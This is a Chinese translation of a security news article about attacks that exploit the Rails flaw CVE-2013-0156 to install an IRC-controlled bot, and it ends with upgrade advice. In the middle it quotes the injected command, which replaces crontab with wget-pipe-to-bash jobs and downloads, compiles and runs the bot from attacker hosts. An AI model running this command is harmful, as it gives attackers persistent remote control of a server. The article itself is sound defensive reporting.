在过去的几天里,攻击者已经越来越多地试图通过一个 Rails 框架的安全漏洞来攻陷服务器。成功的入侵者在服务器上安装一个机器人,使其等到来自 IRC 频道的进一步指示。
在安全专家 Jeff Jarmoc 的博客中写到,攻击者是通过 CVE 2013-0156 漏洞试图攻击的。尽管该漏洞已经在1月份时关闭,但还有相当多的服务器仍然运行过时的 Ruby 版本。Jarmoc 称攻击者尝试注入如下命令:
crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k
这导致系统自动下载 bot (k.c) 编译然后执行,Jarmoc 在其博客上也公布了该机器人程序的源码。“k” 尝试联系位于 cvv4you.ru 域的 IRC 服务器,然后加入 #rails 频道,在这里等待进一步的攻击指令。Jarmoc 称 k 程序可通过指令下载并执行任意代码。目前该 IRC 服务器已经能够不可用,至少现在的地址是不可用的。
该机器人程序在进程列表中显示为 "- bash" ,启动时会同时创建一个 /tmp/tan.pid 文件以确保同一时间只有一个进程实例运行。所有使用 Rails 框架的用户应该确认正在使用当前的 Rails 版本,当前可靠的版本包括:3.2.13, 3.1.12 and 2.3.18.
英文原文: h-online
译文链接:http://www.oschina.net/news/40942/attack-wave-on-ruby-on-rails